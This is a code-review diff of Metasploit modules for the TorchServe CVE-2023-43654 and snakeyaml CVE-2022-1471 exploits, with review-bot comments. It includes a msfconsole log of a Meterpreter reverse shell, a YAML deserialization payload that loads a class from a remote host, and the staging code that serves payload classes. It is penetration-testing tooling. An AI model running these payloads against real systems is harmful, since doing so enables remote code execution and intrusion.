Address comments from the review
parent
de8e392b7b
commit
86b7ec4518
|
@ -33,20 +33,21 @@ PAYLOAD => java/meterpreter/reverse_tcp
|
|||
msf6 exploit(multi/http/torchserver_cve_2023_43654) > set LHOST 192.168.159.128
|
||||
LHOST => 192.168.159.128
|
||||
msf6 exploit(multi/http/torchserver_cve_2023_43654) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
|
||||
[*] Using URL: http://192.168.159.128:9090/exploit/
|
||||
[*] Using URL: http://192.168.159.128:9090/VLz5xafKtJOjBAv/
|
||||
[*] Registering the model archive...
|
||||
[+] Sending model archive
|
||||
[*] Sending stage (59909 bytes) to 172.17.0.2
|
||||
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 172.17.0.2:39480) at 2023-10-05 16:13:54 -0400
|
||||
[*] Sending stage (57692 bytes) to 172.17.0.2
|
||||
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:49662) at 2023-10-12 09:19:30 -0400
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: model-server
|
||||
meterpreter > sysinfo
|
||||
Computer : 4dbcfe5cc11c
|
||||
Computer : 187de8da4e1b
|
||||
OS : Linux 6.2.15-100.fc36.x86_64 (amd64)
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
|
||||
// javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java
|
||||
import javax.script.ScriptEngine;
|
||||
import javax.script.ScriptEngineFactory;
|
||||
import java.io.IOException;
|
||||
|
|
|
@ -1,17 +1,25 @@
|
|||
# Overview
|
||||
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
|
||||
CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
|
||||
The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
|
||||
exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
|
||||
|
||||
See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.
|
||||
|
||||
## Compiling
|
||||
Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
|
||||
It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the
|
||||
[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
|
||||
files.
|
||||
|
||||
Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.
|
||||
|
||||
## Usage
|
||||
Trigger the deserialization using the following YAML:
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
|
||||
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
|
||||
```
|
||||
|
||||
Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
|
||||
contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
|
||||
`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
|
||||
deliver a Metasploit payload.
|
||||
|
||||
[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java
|
||||
|
|
|
@ -63,21 +63,22 @@ module ClassLoader
|
|||
case resource
|
||||
# Stage 1
|
||||
when "#{class_name}.class"
|
||||
vprint_good('Sending constructor class')
|
||||
vprint_good('Sending the constructor class')
|
||||
# This contains the constructor that will call our JavaPayload
|
||||
res = constructor_class
|
||||
# Stage 2
|
||||
when 'metasploit/Payload.class'
|
||||
vprint_good('Sending payload class')
|
||||
vprint_good('Sending the main payload class')
|
||||
# This is our JavaPayload as a compiled class
|
||||
res = MetasploitPayloads.read('java/metasploit/Payload.class')
|
||||
# Stage 3
|
||||
when 'metasploit.dat'
|
||||
vprint_good('Sending payload config')
|
||||
vprint_good('Sending the payload configuration data')
|
||||
# This tells the target how to address the payload; this is the magic!
|
||||
res = payload_instance.stager_config
|
||||
# (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp
|
||||
when /^javapayload\/stage\/(Shell|Stage|StreamForwarder)\.class$/
|
||||
when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/
|
||||
vprint_good("Sending additional payload class: #{resource}")
|
||||
res = MetasploitPayloads.read("java/#{resource}")
|
||||
else
|
||||
vprint_error('Sending 404')
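Review bot: The new regex in the Stage 4 branch still anchors with `^` and `$`, which in Ruby match at line boundaries rather than string ends, so a `resource` value that contains a newline ahead of `javapayload/stage/...` would also satisfy this `when` and be passed on to `MetasploitPayloads.read("java/#{resource}")`; the allowlist is only tight with string anchors, i.e. `when %r{\Ajavapayload/stage/(?:Shell|Stage|StreamForwarder)\.class\z}`. This matters because `resource` appears to be derived from the request the target sends to the listener and is therefore not under the module's control, though how it is derived is outside the hunk. The enclosing method starts outside the hunk.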
|
||||
|
|
|
@ -70,7 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
version = res.get_json_document.dig('info', 'version')
|
||||
return Exploit::CheckCode::Safe unless version.present?
|
||||
return Exploit::CheckCode::Detected unless version.present?
|
||||
|
||||
unless Rex::Version.new(version) < Rex::Version.new('8.0.2')
|
||||
return Exploit::CheckCode::Safe("Version #{version} is patched.")
|
||||
end
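Review bot: The threshold in the unchanged comparison `Rex::Version.new(version) < Rex::Version.new('8.0.2')` looks transposed: the TorchServe release that fixed CVE-2023-43654 is 0.8.2 (the documentation hunk above also reports 0.8.1 as vulnerable), so with `'8.0.2'` every 0.x build, including patched ones, falls through to the vulnerable result; it should read `unless Rex::Version.new(version) < Rex::Version.new('0.8.2')`. Separately, `Rex::Version.new` (Gem::Version-based, as far as I can tell) raises on a version string it cannot parse, so a non-standard `info.version` from the target would turn the check into an exception instead of a result; a `rescue ArgumentError` around the comparison returning `Exploit::CheckCode::Detected("Could not parse version #{version}")` would keep that case consistent with the new `Detected` fallback. The enclosing `check` method starts and ends outside the hunk.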
|
||||
|
@ -144,6 +145,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def cleanup
|
||||
super
|
||||
|
||||
return unless @model_name
|
||||
|
||||
# see: https://pytorch.org/serve/management_api.html#unregister-a-model
|
||||
send_request_cgi({
|
||||
'method' => 'DELETE',
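Review bot: The unregister request begins in this hunk but its tail and any handling of the response are outside it, so I cannot see whether a failed DELETE is surfaced to the operator; if it is not, add something like `print_warning("Failed to unregister model #{@model_name}") unless res&.code == 200`, since a model archive left registered on the target is a persistent artifact that should be reported rather than silently ignored. The new `return unless @model_name` guard is correct for the exit paths where registration never happened. The rest of `cleanup` runs past the end of the hunk.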
|
||||
|
|